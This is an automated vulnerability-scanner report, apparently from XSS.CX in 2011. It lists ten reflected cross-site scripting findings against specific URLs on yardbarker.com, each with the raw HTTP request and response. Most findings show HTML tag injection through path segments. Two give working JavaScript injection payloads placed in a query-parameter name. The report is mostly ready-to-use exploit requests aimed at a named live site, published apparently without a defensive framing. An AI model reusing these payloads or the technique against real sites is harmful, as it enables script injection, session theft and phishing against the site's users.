XSS, yardbarker.com, Cross Site Scripting, CWE-79, CAPEC-86

Report generated by XSS.CX at Thu Mar 24 09:27:08 CDT 2011.

Loading

1. Cross-site scripting (reflected)

1.1. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 1]

1.2. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 4]

1.3. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 5]

1.4. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 1]

1.5. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 4]

1.6. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 5]

1.7. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [name of an arbitrarily supplied request parameter]

1.8. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [REST URL parameter 1]

1.9. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [REST URL parameter 4]

1.10. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [name of an arbitrarily supplied request parameter]


1. Cross-site scripting (reflected)
There are 10 instances of this issue:

1.1. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0206"><a>5e44f9623aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /all_sportsb0206"><a>5e44f9623aa/articles/msn/greatest_march_madness_moments_lego_ized/4428220 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "dcd1bed9905d4f8b52d0d516d6bd62b8"
X-Runtime: 75ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=aa1f052de961c4ae3ab7d79037d368e8; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 64377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/all_sportsb0206"><a>5e44f9623aa/articles/msn/greatest_march_madness_moments_lego_ized/4428220"/>
...[SNIP]...
1.2. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde0a"><a>0b1d368196d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /all_sports/articles/msn/greatest_march_madness_moments_lego_izeddde0a"><a>0b1d368196d/4428220 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "97ff1e6db883bc8b1a3b7682ee618bc1"
X-Runtime: 69ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=17bccf840dd90a7dea0df066ede7cb7c; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 64377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_izeddde0a"><a>0b1d368196d/4428220"/>
...[SNIP]...
1.3. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f67b4"><a>a91a8334255 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220f67b4"><a>a91a8334255 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:07:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "4a58fc63e41732d708cb6564037ea94b"
X-Runtime: 310ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=c35a893d55020f1e7885ac37e7874cfe; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 64637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220f67b4"><a>a91a8334255"/>
...[SNIP]...
1.4. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adf19"><a>b90160f6fca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /college_footballadf19"><a>b90160f6fca/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "c7d1f92cd8fe11617a24ca77b64cff05"
X-Runtime: 75ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=8512ee152c97084f9fd53a051d7f4328; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 74646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/college_footballadf19"><a>b90160f6fca/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/"/>
...[SNIP]...
1.5. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a444c"><a>7d8afe1c1f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_dolla444c"><a>7d8afe1c1f5/4435397/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "31cae7f782f90b2db6b1e6ef824898bd"
X-Runtime: 77ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=86de013a1f4fe84974af71538cf47fea; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 74646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_dolla444c"><a>7d8afe1c1f5/4435397/"/>
...[SNIP]...
1.6. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d93e4"><a>5036e1a289c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397d93e4"><a>5036e1a289c/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "692bdd77ba648fcbd37729a451666b3b"
X-Runtime: 140ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=3ef6c3fb819bb52d19911b95e1d181a5; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 74646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397d93e4"><a>5036e1a289c/"/>
...[SNIP]...
1.7. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yardbarker.com
Path:   /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9be7"><script>alert(1)</script>1c87f9cfc74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/?e9be7"><script>alert(1)</script>1c87f9cfc74=1 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "361138a65d0d3f82dc6915651a9b8dfb"
X-Runtime: 67ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=905b9fe042a7bb7d3bacd3ab5f8d2b5e; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 74671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/?e9be7"><script>alert(1)</script>1c87f9cfc74=1"/>
...[SNIP]...
1.8. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da72b"><a>ff0234e3ef4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nflda72b"><a>ff0234e3ef4/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "f94d91bc85dd6ef92f12d1ef9b49c464"
X-Runtime: 66ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=8eccf93074ffcb4b3d4e639ced60a1d1; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 122855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/nflda72b"><a>ff0234e3ef4/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/"/>
...[SNIP]...
1.9. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb395"><a>15991f989c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battlecb395"><a>15991f989c5/4433792/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "8ebc44f6273a466b8c03baee7b796c8a"
X-Runtime: 66ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=4d0620a01f19b89622fd77418e8f4d41; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 122855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battlecb395"><a>15991f989c5/4433792/"/>
...[SNIP]...
1.10. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yardbarker.com
Path:   /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4f6"><script>alert(1)</script>c55825792fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/?7b4f6"><script>alert(1)</script>c55825792fc=1 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "2dcf6d9d60bb91464dee1fc78c2ead04"
X-Runtime: 81ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=a81e5fd55afa1e171ba988ee18260724; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 122880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/?7b4f6"><script>alert(1)</script>c55825792fc=1"/>
...[SNIP]...
Report generated by XSS.CX at Thu Mar 24 09:27:08 CDT 2011.